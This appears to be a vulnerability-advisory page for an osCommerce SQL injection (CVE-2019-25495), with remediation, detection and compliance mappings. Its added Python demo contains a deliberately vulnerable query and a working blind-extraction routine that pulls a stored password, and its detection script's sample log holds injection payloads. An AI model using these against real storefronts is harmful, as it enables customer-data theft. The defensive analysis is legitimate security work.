CVE-2019-25495

High
CWE-89 — Weakness Type
Published: Feb 27, 2026  ·  Modified: Feb 28, 2026  ·  Source: NVD
CVSS v3.1 base score: 8.2
📄 Description (English)

osCommerce 2.3.4.1 contains a SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the reviews_id parameter. Attackers can send GET requests to product_reviews_write.php with malicious reviews_id values using boolean-based SQL injection payloads to extract sensitive database information.
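The mechanism the description refers to, as an added example that is not osCommerce's own code: a small sqlite3 model of the vulnerable pattern (an integer GET parameter concatenated into SQL), the boolean-based blind extraction it enables, and the parameterised fix. Table and column names are modelled loosely on an osCommerce schema, the rows are constructed for the demo, and the SQL functions are SQLite's (MySQL would use ASCII(SUBSTRING(...))).

```python
"""Added illustration (not osCommerce's code): a sqlite3 model of the
vulnerable pattern behind CVE-2019-25495, an integer parameter pasted
into SQL, the boolean-based blind extraction it enables, and the
parameterised fix.  Table and column names are modelled loosely on an
osCommerce schema; all rows are constructed for the demo."""
import sqlite3
from typing import Callable


def build_db() -> sqlite3.Connection:
    """In-memory store with a reviews table and a customers table."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE reviews (reviews_id INTEGER PRIMARY KEY,
                              products_id INTEGER, reviews_text TEXT);
        CREATE TABLE customers (customers_id INTEGER PRIMARY KEY,
                                customers_email_address TEXT,
                                customers_password TEXT);
        INSERT INTO reviews VALUES (1, 10, 'Great product'), (2, 10, 'Average');
        INSERT INTO customers VALUES (1, 'admin@example.test', 'S3cr3t!');
        """
    )
    return con


def review_exists_vulnerable(con: sqlite3.Connection, reviews_id: str) -> bool:
    """Vulnerable pattern: the raw GET parameter is concatenated into the
    query, so 'reviews_id=1 AND <condition>' lets the caller ask the
    database arbitrary yes/no questions.  Returns whether any row matched,
    which is the only signal a blind attacker needs."""
    sql = "SELECT reviews_id FROM reviews WHERE reviews_id = " + reviews_id
    return con.execute(sql).fetchone() is not None


def review_exists_fixed(con: sqlite3.Connection, reviews_id: str) -> bool:
    """Hardened pattern: strict integer validation, then a bound parameter.
    The binding alone removes the injection; the validation also rejects
    junk early with a clear error instead of a database exception."""
    if not reviews_id.isdigit():
        raise ValueError("reviews_id must be a non-negative integer")
    row = con.execute(
        "SELECT reviews_id FROM reviews WHERE reviews_id = ?", (int(reviews_id),)
    ).fetchone()
    return row is not None


def blind_extract(oracle: Callable[[str], bool], scalar_subquery: str,
                  max_len: int = 64) -> tuple[str, int]:
    """Recover the string returned by `scalar_subquery` using only the
    true/false oracle.  Binary search over the length, then over each
    character's code point, costs roughly 7 oracle queries per character."""
    queries = 0

    def ask(condition: str) -> bool:
        nonlocal queries
        queries += 1
        # review 1 exists, so the endpoint's answer equals the condition
        return oracle(f"1 AND ({condition})")

    def search(cond_template: str, hi: int) -> int:
        # smallest v for which "<expr> > v" is false, i.e. the value itself
        lo = 0
        while lo < hi:
            mid = (lo + hi) // 2
            if ask(cond_template.format(v=mid)):
                lo = mid + 1
            else:
                hi = mid
        return lo

    length = search(f"length({scalar_subquery}) > {{v}}", max_len)
    chars = [
        chr(search(f"unicode(substr({scalar_subquery}, {pos}, 1)) > {{v}}", 127))
        for pos in range(1, length + 1)
    ]
    return "".join(chars), queries


if __name__ == "__main__":
    con = build_db()
    target = "(SELECT customers_password FROM customers WHERE customers_id = 1)"
    secret, cost = blind_extract(lambda p: review_exists_vulnerable(con, p), target)
    print(f"vulnerable endpoint leaked {secret!r} in {cost} requests")
    try:
        review_exists_fixed(con, "1 AND 1=1")
    except ValueError as exc:
        print(f"hardened endpoint rejected payload: {exc}")
```

The request count matters for defenders: a seven-character value costs on the order of fifty requests, so a real extraction run against the live endpoint shows up in access logs as a burst of product_reviews_write.php hits whose reviews_id values differ only in a comparison constant.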

🤖 AI Executive Summary

CVE-2019-25495 is a high-severity SQL injection vulnerability in osCommerce 2.3.4.1 affecting the product_reviews_write.php endpoint. Unauthenticated attackers can exploit boolean-based blind SQL injection through the reviews_id parameter to read sensitive database contents, such as customer records and stored credential hashes, one true/false answer at a time. With a CVSS 3.1 base score of 8.2 (High), network reachability, and no authentication or user interaction required, this vulnerability is an immediate threat to any Internet-exposed osCommerce 2.3.4.1 storefront. Although no public exploit is recorded in the feed, the advisory names the endpoint and the parameter, and boolean-based injection against an integer parameter is automated by off-the-shelf tooling, so exposed instances should be treated as exploitable.

🤖 AI Intelligence Analysis (analyzed: Apr 25, 2026 08:54)
🇸🇦 Saudi Arabia Impact Assessment
Saudi e-commerce businesses, particularly SMEs and retailers running osCommerce storefronts, face direct exposure. High-risk sectors include: (1) retail and e-commerce platforms selling through osCommerce; (2) banks and payment providers whose processing systems are integrated with affected storefronts; (3) government procurement portals built on osCommerce; (4) healthcare e-pharmacies; (5) telecom providers offering online ordering. The vulnerability lets an unauthenticated attacker read the store database (the CVSS vector rates confidentiality impact High and integrity impact Low), exposing customer PII, order history, stored credential hashes and any payment-related records the store retains, which brings SAMA and NCA notification and compliance obligations into play.
🏢 Affected Saudi Sectors
Retail & E-commerce Banking & Financial Services Government & Public Sector Healthcare & Pharmaceuticals Telecommunications Hospitality & Tourism
⚖️ Saudi Risk Score (AI)
8.5
/ 10.0
🔧 Remediation Steps (English)
IMMEDIATE ACTIONS:
1. Identify all osCommerce 2.3.4.1 instances in your environment (asset inventory, network scanning, and checking known storefronts for the product_reviews_write.php endpoint)
2. Isolate affected systems from production if the fix cannot be applied immediately
3. Enable WAF rules that reject any non-numeric value for the reviews_id parameter on product_reviews_write.php, rather than relying only on generic SQL keyword signatures, which boolean-based payloads can avoid
4. Review web access logs and database query logs for injection activity: UNION/SELECT, INFORMATION_SCHEMA, SUBSTRING/ASCII/LENGTH probes, and paired requests that differ only by a true/false condition such as AND 1=1 versus AND 1=2

PATCHING:
1. Upgrade osCommerce to a release that contains the fix for this issue; confirm the exact fixed version against the vendor references linked from the NVD entry
2. If an upgrade is not feasible, change the query that consumes reviews_id in product_reviews_write.php to a prepared statement with reviews_id bound as a parameter; parameterisation, not "sanitising" the string, is what removes the injection
3. In addition, validate reviews_id as a non-negative integer before it reaches the query and reject any other value with an HTTP 400

COMPENSATING CONTROLS:
1. Restrict the database account used by the web application to the minimum privileges required (no access to other schemas, no FILE or administrative rights); a blind injection still reads everything that account can see, so keep sensitive data out of its reach wherever the application allows
2. Enable database query logging and monitor for anomalous SQL patterns and unusual query volume from the application's database user
3. Deploy IDS/IPS signatures for SQL injection attempts
4. Rate-limit product_reviews_write.php per client IP; blind extraction needs tens of requests per recovered field, so a low ceiling slows it sharply
5. Use a Web Application Firewall with SQL injection detection rules

DETECTION:
1. Monitor GET requests to product_reviews_write.php whose reviews_id value is not a plain integer (quotes, spaces, parentheses, comment sequences, SQL keywords)
2. Alert on bursts of such requests from one source, on pairs of requests that differ only by a true/false condition (boolean-based blind injection), and on SUBSTRING/ASCII/LENGTH probes against tables the endpoint never touches
3. Correlate with database-side signals: spikes in query count from the application user, queries referencing INFORMATION_SCHEMA, and unusual query execution times (time-based variants)
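The detection steps above, implemented over web access logs as an added example that is not part of the original page: the script parses combined-format lines, URL-decodes the reviews_id parameter of product_reviews_write.php, flags every value that is not a plain integer, names the injection technique it resembles, and reports sources with enough flagged requests to look like an automated run. SAMPLE_LOG is constructed traffic (addresses from documentation ranges, not real data), and the pattern names are our own.

```python
"""Added detection example (not from the original page): scan web access
logs for injection attempts against the reviews_id parameter of
product_reviews_write.php.  SAMPLE_LOG is constructed traffic in
combined log format, not real data; the pattern names are our own."""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample: one client probing the endpoint, one browsing normally.
SAMPLE_LOG = """\
203.0.113.7 - - [25/Apr/2026:08:50:01 +0300] "GET /product_reviews_write.php?products_id=10&reviews_id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Apr/2026:08:50:02 +0300] "GET /product_reviews_write.php?products_id=10&reviews_id=1%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Apr/2026:08:50:02 +0300] "GET /product_reviews_write.php?products_id=10&reviews_id=1%20AND%201%3D2 HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Apr/2026:08:50:03 +0300] "GET /product_reviews_write.php?reviews_id=1%20AND%20ASCII(SUBSTRING((SELECT%20customers_password%20FROM%20customers%20LIMIT%201),1,1))%3E64 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [25/Apr/2026:08:51:10 +0300] "GET /product_reviews_write.php?products_id=10&reviews_id=2 HTTP/1.1" 200 5130 "-" "Mozilla/5.0"
198.51.100.9 - - [25/Apr/2026:08:51:12 +0300] "GET /product_info.php?products_id=10 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# client, timestamp, method, request target, status, response size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) (\d+|-)')

# Technique signatures applied to the decoded reviews_id value.
SQLI_PATTERNS = {
    "boolean_test": re.compile(r"\b(and|or)\b\s*\d+\s*=\s*\d+", re.I),
    "union_select": re.compile(r"\bunion\b[\s\S]*\bselect\b", re.I),
    "data_probe": re.compile(r"information_schema|substring\(|substr\(|ascii\(|length\(", re.I),
    "time_based": re.compile(r"\bsleep\(|benchmark\(|waitfor\s+delay", re.I),
    "quote_or_comment": re.compile(r"['\"]|--|/\*|#"),
}


def parse_line(line: str):
    """Split one access-log line into fields; query parameters are URL-decoded."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status, size = m.groups()
    parts = urlsplit(target)
    return {"ip": ip, "time": ts, "method": method, "path": parts.path,
            "query": parse_qs(parts.query, keep_blank_values=True),
            "status": int(status), "size": 0 if size == "-" else int(size)}


def classify(value: str) -> list:
    """Names of the injection techniques a reviews_id value resembles."""
    return [name for name, rx in SQLI_PATTERNS.items() if rx.search(value)]


def analyze(log_text: str, burst_threshold: int = 3):
    """Return (findings, bursty_ips).  A finding is one request whose
    reviews_id is not a plain integer; bursty_ips are sources with at
    least burst_threshold such requests, the shape of an automated
    blind-extraction run."""
    findings = []
    per_ip = defaultdict(int)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["path"].endswith("/product_reviews_write.php"):
            continue
        for value in rec["query"].get("reviews_id", []):
            if value.isdigit():
                continue  # well-formed request: reviews_id is a plain integer
            reasons = classify(value) or ["non_numeric"]
            per_ip[rec["ip"]] += 1
            findings.append({"ip": rec["ip"], "time": rec["time"],
                             "reviews_id": value, "reasons": reasons,
                             "status": rec["status"], "size": rec["size"]})
    bursty = sorted(ip for ip, n in per_ip.items() if n >= burst_threshold)
    return findings, bursty


if __name__ == "__main__":
    found, bursts = analyze(SAMPLE_LOG)
    for f in found:
        print(f"{f['time']} {f['ip']} size={f['size']} {f['reasons']} reviews_id={f['reviews_id']!r}")
    print("bursty sources:", bursts)
```

The response size is kept in each finding on purpose: in a boolean-based attack the true and false probes return different page sizes (5120 versus 4870 in the constructed sample), and that difference is the attacker's oracle, so it is also a strong confirmation signal for the analyst. The strict "is it a plain integer" test carries most of the weight; the technique signatures only label what was found.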
📋 Regulatory Compliance Mapping
🟢 NCA ECC 2024
Vulnerability management (timely remediation of published vulnerabilities on Internet-facing systems); secure software development and web application security (input validation and protection against injection); cybersecurity event logging and monitoring. Map these to the specific ECC 2024 control numbers in your organisation's control register.
🔵 SAMA CSF
Secure application development and vulnerability management; protection of customer data from unauthorised access; continuous security monitoring of the network and applications for potential cybersecurity events.
🟡 ISO 27001:2022
ISO 27001:2022 A.8.8 - Management of technical vulnerabilities; A.8.25 - Secure development life cycle; A.8.26 - Application security requirements; A.8.28 - Secure coding
🟣 PCI DSS v4.0.1
PCI DSS 6.2.4 - Prevention of common software attacks, including injection; PCI DSS 6.3.3 - Installation of applicable security patches and updates; PCI DSS 11.3.1 / 11.3.2 - Internal and external vulnerability scans
📊 CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
Attack Vector (AV:N): Network
Attack Complexity (AC:L): Low
Privileges Required (PR:N): None
User Interaction (UI:N): None
Scope (S:U): Unchanged
Confidentiality (C:H): High
Integrity (I:L): Low
Availability (A:N): None
📋 Quick Facts
Severity: High
CVSS Score: 8.2
CWE: CWE-89
EPSS: 0.07%
Exploit: No
Patch: Yes
Published: 2026-02-27
Source Feed: nvd
🇸🇦 Saudi Risk Score: 8.5 / 10.0
Priority: CRITICAL
🏷️ Tags
CWE-89